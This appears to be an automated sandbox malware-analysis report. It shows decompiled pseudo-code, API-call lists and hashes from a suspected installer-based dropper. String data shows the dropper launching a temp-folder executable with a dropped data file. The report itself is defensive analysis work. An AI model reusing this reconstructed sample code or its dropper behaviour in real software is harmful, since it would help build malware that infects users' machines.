                                                          										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                          										SetFilePointer(_t48, 0, 0, 0);
                                                          										E0040620A(_t48, _t46, _t42 + _t37);
                                                          										GlobalFree(_t46);
                                                          										goto L18;
                                                          									}
                                                          									_t39 = _t46 + _t42;
                                                          									_t31 = _t39 + _t37;
                                                          									while(_t39 > _t49) {
                                                          										 *_t31 =  *_t39;
                                                          										_t31 = _t31 - 1;
                                                          										_t39 = _t39 - 1;
                                                          									}
                                                          									_t24 = _t49 - _t46 + 1;
                                                          									_t48 =  *(_t53 + 0x18);
                                                          									goto L17;
                                                          								}
                                                          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                          								_t42 = _t42 + 0xa;
                                                          								goto L16;
                                                          							}
                                                          						}
                                                          					}
                                                          				} else {
                                                          					CloseHandle(E00406158(_t44, 0, 1));
                                                          					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                          					if(_t12 != 0 && _t12 <= 0x400) {
                                                          						goto L3;
                                                          					}
                                                          				}
                                                          				return _t12;
                                                          			}



















                                                          0x004062ae
                                                          0x004062b7
                                                          0x004062be
                                                          0x004062c8
                                                          0x004062dc
                                                          0x00406304
                                                          0x0040630b
                                                          0x0040630f
                                                          0x00406313
                                                          0x00406333
                                                          0x0040633a
                                                          0x00406344
                                                          0x00406351
                                                          0x00406356
                                                          0x0040635b
                                                          0x0040635f
                                                          0x0040636e
                                                          0x00406370
                                                          0x0040637d
                                                          0x00406381
                                                          0x0040641c
                                                          0x00000000
                                                          0x00406397
                                                          0x004063a4
                                                          0x004063c8
                                                          0x004063cc
                                                          0x004063eb
                                                          0x004063ef
                                                          0x004063ef
                                                          0x004063f1
                                                          0x004063fa
                                                          0x00406405
                                                          0x00406410
                                                          0x00406416
                                                          0x00000000
                                                          0x00406416
                                                          0x004063ce
                                                          0x004063d1
                                                          0x004063dc
                                                          0x004063d8
                                                          0x004063da
                                                          0x004063db
                                                          0x004063db
                                                          0x004063e3
                                                          0x004063e5
                                                          0x00000000
                                                          0x004063e5
                                                          0x004063af
                                                          0x004063b5
                                                          0x00000000
                                                          0x004063b5
                                                          0x00406381
                                                          0x0040635f
                                                          0x004062de
                                                          0x004062e9
                                                          0x004062f2
                                                          0x004062f6
                                                          0x00000000
                                                          0x00000000
                                                          0x004062f6
                                                          0x00406427

                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                          • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                          • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                          • wsprintfA.USER32 ref: 0040632D
                                                          • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                          • GlobalFree.KERNEL32 ref: 00406416
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040615C
                                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                          • API String ID: 2171350718-2295842750
                                                          • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                          • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                          • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                          • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				struct tagRECT _v32;
                                                          				struct tagPAINTSTRUCT _v96;
                                                          				struct HDC__* _t70;
                                                          				struct HBRUSH__* _t87;
                                                          				struct HFONT__* _t94;
                                                          				long _t102;
                                                          				signed int _t126;
                                                          				struct HDC__* _t128;
                                                          				intOrPtr _t130;
                                                          
                                                          				if(_a8 == 0xf) {
                                                          					_t130 =  *0x42a270;
                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                          					_a8 = _t70;
                                                          					GetClientRect(_a4,  &_v32);
                                                          					_t126 = _v32.bottom;
                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                          					while(_v32.top < _t126) {
                                                          						_a12 = _t126 - _v32.top;
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                          						_v32.bottom = _v32.bottom + 4;
                                                          						_a16 = _t87;
                                                          						FillRect(_a8,  &_v32, _t87);
                                                          						DeleteObject(_a16);
                                                          						_v32.top = _v32.top + 4;
                                                          					}
                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                          						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                          						_a16 = _t94;
                                                          						if(_t94 != 0) {
                                                          							_t128 = _a8;
                                                          							_v32.left = 0x10;
                                                          							_v32.top = 8;
                                                          							SetBkMode(_t128, 1);
                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                          							_a8 = SelectObject(_t128, _a16);
                                                          							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                          							SelectObject(_t128, _a8);
                                                          							DeleteObject(_a16);
                                                          						}
                                                          					}
                                                          					EndPaint(_a4,  &_v96);
                                                          					return 0;
                                                          				}
                                                          				_t102 = _a16;
                                                          				if(_a8 == 0x46) {
                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                          				}
                                                          				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                          			}













                                                          0x0040100a
                                                          0x00401039
                                                          0x00401047
                                                          0x0040104d
                                                          0x00401051
                                                          0x0040105b
                                                          0x00401061
                                                          0x00401064
                                                          0x004010f3
                                                          0x00401089
                                                          0x0040108c
                                                          0x004010a6
                                                          0x004010bd
                                                          0x004010cc
                                                          0x004010cf
                                                          0x004010d5
                                                          0x004010d9
                                                          0x004010e4
                                                          0x004010ed
                                                          0x004010ef
                                                          0x004010ef
                                                          0x00401100
                                                          0x00401105
                                                          0x0040110d
                                                          0x00401110
                                                          0x00401112
                                                          0x00401118
                                                          0x0040111f
                                                          0x00401126
                                                          0x00401130
                                                          0x00401142
                                                          0x00401156
                                                          0x00401160
                                                          0x00401165
                                                          0x00401165
                                                          0x00401110
                                                          0x0040116e
                                                          0x00000000
                                                          0x00401178
                                                          0x00401010
                                                          0x00401013
                                                          0x00401015
                                                          0x0040101f
                                                          0x0040101f
                                                          0x00000000

                                                          APIs
                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                          • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                          • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                          • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 72%
                                                          			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                          				struct _ITEMIDLIST* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _t44;
                                                          				WCHAR* _t45;
                                                          				signed char _t47;
                                                          				signed int _t48;
                                                          				short _t59;
                                                          				short _t61;
                                                          				short _t63;
                                                          				void* _t71;
                                                          				signed int _t77;
                                                          				signed int _t78;
                                                          				short _t81;
                                                          				short _t82;
                                                          				signed char _t84;
                                                          				signed int _t85;
                                                          				void* _t98;
                                                          				void* _t104;
                                                          				intOrPtr* _t105;
                                                          				void* _t107;
                                                          				WCHAR* _t108;
                                                          				void* _t110;
                                                          
                                                          				_t107 = __esi;
                                                          				_t104 = __edi;
                                                          				_t71 = __ebx;
                                                          				_t44 = _a8;
                                                          				if(_t44 < 0) {
                                                          					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                          				}
                                                          				_push(_t71);
                                                          				_push(_t107);
                                                          				_push(_t104);
                                                          				_t105 =  *0x42a298 + _t44 * 2;
                                                          				_t45 = 0x428200;
                                                          				_t108 = 0x428200;
                                                          				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                          					_t108 = _a4;
                                                          					_a4 = _a4 & 0x00000000;
                                                          				}
                                                          				_t81 =  *_t105;
                                                          				_a8 = _t81;
                                                          				if(_t81 == 0) {
                                                          					L43:
                                                          					 *_t108 =  *_t108 & 0x00000000;
                                                          					if(_a4 == 0) {
                                                          						return _t45;
                                                          					}
                                                          					return E00406668(_a4, _t45);
                                                          				} else {
                                                          					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                          						_t98 = 2;
                                                          						_t105 = _t105 + _t98;
                                                          						if(_t81 >= 4) {
                                                          							if(__eflags != 0) {
                                                          								 *_t108 = _t81;
                                                          								_t108 = _t108 + _t98;
                                                          								__eflags = _t108;
                                                          							} else {
                                                          								 *_t108 =  *_t105;
                                                          								_t108 = _t108 + _t98;
                                                          								_t105 = _t105 + _t98;
                                                          							}
                                                          							L42:
                                                          							_t82 =  *_t105;
                                                          							_a8 = _t82;
                                                          							if(_t82 != 0) {
                                                          								_t81 = _a8;
                                                          								continue;
                                                          							}
                                                          							goto L43;
                                                          						}
                                                          						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                          						_t47 =  *_t105;
                                                          						_t48 = _t47 & 0x000000ff;
                                                          						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                          						_t85 = _t84 & 0x000000ff;
                                                          						_v28 = _t48 | 0x00008000;
                                                          						_t77 = 2;
                                                          						_v16 = _t85;
                                                          						_t105 = _t105 + _t77;
                                                          						_v24 = _t48;
                                                          						_v20 = _t85 | 0x00008000;
                                                          						if(_a8 != _t77) {
                                                          							__eflags = _a8 - 3;
                                                          							if(_a8 != 3) {
                                                          								__eflags = _a8 - 1;
                                                          								if(__eflags == 0) {
                                                          									__eflags = (_t48 | 0xffffffff) - _v12;
                                                          									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                          								}
                                                          								L38:
                                                          								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                          								_t45 = 0x428200;
                                                          								goto L42;
                                                          							}
                                                          							_t78 = _v12;
                                                          							__eflags = _t78 - 0x1d;
                                                          							if(_t78 != 0x1d) {
                                                          								__eflags = (_t78 << 0xb) + 0x42b000;
                                                          								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                          							} else {
                                                          								E004065AF(_t108,  *0x42a268);
                                                          							}
                                                          							__eflags = _t78 + 0xffffffeb - 7;
                                                          							if(__eflags < 0) {
                                                          								L29:
                                                          								E004068EF(_t108);
                                                          							}
                                                          							goto L38;
                                                          						}
                                                          						if( *0x42a2e4 != 0) {
                                                          							_t77 = 4;
                                                          						}
                                                          						_t121 = _t48;
                                                          						if(_t48 >= 0) {
                                                          							__eflags = _t48 - 0x25;
                                                          							if(_t48 != 0x25) {
                                                          								__eflags = _t48 - 0x24;
                                                          								if(_t48 == 0x24) {
                                                          									GetWindowsDirectoryW(_t108, 0x400);
                                                          									_t77 = 0;
                                                          								}
                                                          								while(1) {
                                                          									__eflags = _t77;
                                                          									if(_t77 == 0) {
                                                          										goto L26;
                                                          									}
                                                          									_t59 =  *0x42a264;
                                                          									_t77 = _t77 - 1;
                                                          									__eflags = _t59;
                                                          									if(_t59 == 0) {
                                                          										L22:
                                                          										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                          										__eflags = _t61;
                                                          										if(_t61 != 0) {
                                                          											L24:
                                                          											 *_t108 =  *_t108 & 0x00000000;
                                                          											__eflags =  *_t108;
                                                          											continue;
                                                          										}
                                                          										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                          										_a8 = _t61;
                                                          										__imp__CoTaskMemFree(_v8);
                                                          										__eflags = _a8;
                                                          										if(_a8 != 0) {
                                                          											goto L26;
                                                          										}
                                                          										goto L24;
                                                          									}
                                                          									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                          									__eflags = _t63;
                                                          									if(_t63 == 0) {
                                                          										goto L26;
                                                          									}
                                                          									goto L22;
                                                          								}
                                                          								goto L26;
                                                          							}
                                                          							GetSystemDirectoryW(_t108, 0x400);
                                                          							goto L26;
                                                          						} else {
                                                          							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                          							if( *_t108 != 0) {
                                                          								L27:
                                                          								if(_v16 == 0x1a) {
                                                          									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                          								}
                                                          								goto L29;
                                                          							}
                                                          							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                          							L26:
                                                          							if( *_t108 == 0) {
                                                          								goto L29;
                                                          							}
                                                          							goto L27;
                                                          						}
                                                          					}
                                                          					goto L43;
                                                          				}
                                                          			}





























                                                          0x004066a5
                                                          0x004066a5
                                                          0x004066a5
                                                          0x004066ab
                                                          0x004066b0
                                                          0x004066c1
                                                          0x004066c1
                                                          0x004066c9
                                                          0x004066ca
                                                          0x004066cb
                                                          0x004066cc
                                                          0x004066cf
                                                          0x004066d7
                                                          0x004066d9
                                                          0x004066ea
                                                          0x004066ed
                                                          0x004066ed
                                                          0x004066f1
                                                          0x004066f7
                                                          0x004066fa
                                                          0x004068d5
                                                          0x004068d5
                                                          0x004068e0
                                                          0x004068ec
                                                          0x004068ec
                                                          0x00000000
                                                          0x00406700
                                                          0x00406705
                                                          0x0040671a
                                                          0x0040671b
                                                          0x00406721
                                                          0x004068b3
                                                          0x004068c1
                                                          0x004068c4
                                                          0x004068c4
                                                          0x004068b5
                                                          0x004068b8
                                                          0x004068bb
                                                          0x004068bd
                                                          0x004068bd
                                                          0x004068c6
                                                          0x004068c6
                                                          0x004068cc
                                                          0x004068cf
                                                          0x00406702
                                                          0x00000000
                                                          0x00406702
                                                          0x00000000
                                                          0x004068cf
                                                          0x00406727
                                                          0x0040672a
                                                          0x00406739
                                                          0x00406740
                                                          0x0040674c
                                                          0x0040674f
                                                          0x00406752
                                                          0x00406753
                                                          0x00406758
                                                          0x0040675e
                                                          0x00406761
                                                          0x00406764
                                                          0x00406857
                                                          0x0040685c
                                                          0x0040688f
                                                          0x00406894
                                                          0x00406899
                                                          0x0040689e
                                                          0x0040689e
                                                          0x004068a3
                                                          0x004068a9
                                                          0x004068ac
                                                          0x00000000
                                                          0x004068ac
                                                          0x0040685e
                                                          0x00406861
                                                          0x00406864
                                                          0x00406879
                                                          0x00406880
                                                          0x00406866
                                                          0x0040686d
                                                          0x0040686d
                                                          0x00406888
                                                          0x0040688b
                                                          0x0040684f
                                                          0x00406850
                                                          0x00406850
                                                          0x00000000
                                                          0x0040688b
                                                          0x00406771
                                                          0x00406775
                                                          0x00406775
                                                          0x00406776
                                                          0x00406778
                                                          0x004067b5
                                                          0x004067b8
                                                          0x004067c8
                                                          0x004067cb
                                                          0x004067d3
                                                          0x004067d9
                                                          0x004067d9
                                                          0x00406834
                                                          0x00406834
                                                          0x00406836
                                                          0x00000000
                                                          0x00000000
                                                          0x004067dd
                                                          0x004067e2
                                                          0x004067e3
                                                          0x004067e5
                                                          0x004067fc
                                                          0x0040680a
                                                          0x00406810
                                                          0x00406812
                                                          0x00406830
                                                          0x00406830
                                                          0x00406830
                                                          0x00000000
                                                          0x00406830
                                                          0x00406818
                                                          0x00406821
                                                          0x00406824
                                                          0x0040682a
                                                          0x0040682e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040682e
                                                          0x004067f6
                                                          0x004067f8
                                                          0x004067fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004067fa
                                                          0x00000000
                                                          0x00406834
                                                          0x004067c0
                                                          0x00000000
                                                          0x0040677a
                                                          0x00406798
                                                          0x004067a1
                                                          0x0040683e
                                                          0x00406842
                                                          0x0040684a
                                                          0x0040684a
                                                          0x00000000
                                                          0x00406842
                                                          0x004067ab
                                                          0x00406838
                                                          0x0040683c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040683c
                                                          0x00406778
                                                          0x00000000
                                                          0x00406705

                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000400), ref: 004067C0
                                                          • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                          • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                          • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                                          • String ID: "C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4260037668-4201873422
                                                          • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                          • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                          • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                          • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004056CA(signed int _a4, WCHAR* _a8) {
                                                          				struct HWND__* _v8;
                                                          				signed int _v12;
                                                          				WCHAR* _v32;
                                                          				long _v44;
                                                          				int _v48;
                                                          				void* _v52;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				WCHAR* _t27;
                                                          				signed int _t28;
                                                          				long _t29;
                                                          				signed int _t37;
                                                          				signed int _t38;
                                                          
                                                          				_t27 =  *0x429244;
                                                          				_v8 = _t27;
                                                          				if(_t27 != 0) {
                                                          					_t37 =  *0x42a314;
                                                          					_v12 = _t37;
                                                          					_t38 = _t37 & 0x00000001;
                                                          					if(_t38 == 0) {
                                                          						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                          					}
                                                          					_t27 = lstrlenW(0x422728);
                                                          					_a4 = _t27;
                                                          					if(_a8 == 0) {
                                                          						L6:
                                                          						if((_v12 & 0x00000004) == 0) {
                                                          							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                                          						}
                                                          						if((_v12 & 0x00000002) == 0) {
                                                          							_v32 = 0x422728;
                                                          							_v52 = 1;
                                                          							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                          							_v44 = 0;
                                                          							_v48 = _t29 - _t38;
                                                          							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                          							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                          						}
                                                          						if(_t38 != 0) {
                                                          							_t28 = _a4;
                                                          							0x422728[_t28] = 0;
                                                          							return _t28;
                                                          						}
                                                          					} else {
                                                          						_t27 = lstrlenW(_a8) + _a4;
                                                          						if(_t27 < 0x1000) {
                                                          							_t27 = lstrcatW(0x422728, _a8);
                                                          							goto L6;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t27;
                                                          			}

















                                                          0x004056d0
                                                          0x004056da
                                                          0x004056df
                                                          0x004056e5
                                                          0x004056f0
                                                          0x004056f3
                                                          0x004056f6
                                                          0x004056fc
                                                          0x004056fc
                                                          0x00405702
                                                          0x0040570a
                                                          0x0040570d
                                                          0x0040572a
                                                          0x0040572e
                                                          0x00405737
                                                          0x00405737
                                                          0x00405741
                                                          0x0040574a
                                                          0x00405756
                                                          0x0040575d
                                                          0x00405761
                                                          0x00405764
                                                          0x00405777
                                                          0x00405785
                                                          0x00405785
                                                          0x00405789
                                                          0x0040578b
                                                          0x0040578e
                                                          0x00000000
                                                          0x0040578e
                                                          0x0040570f
                                                          0x00405717
                                                          0x0040571f
                                                          0x00405725
                                                          0x00000000
                                                          0x00405725
                                                          0x0040571f
                                                          0x0040570d
                                                          0x0040579a

                                                          APIs
                                                          • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                          • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                          • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                          • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                            • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\zjlxnt.exe" C:\Users\user\AppData\Local\Temp\anaictjg.cte,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                          • String ID: ('B
                                                          • API String ID: 1495540970-2332581011
                                                          • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
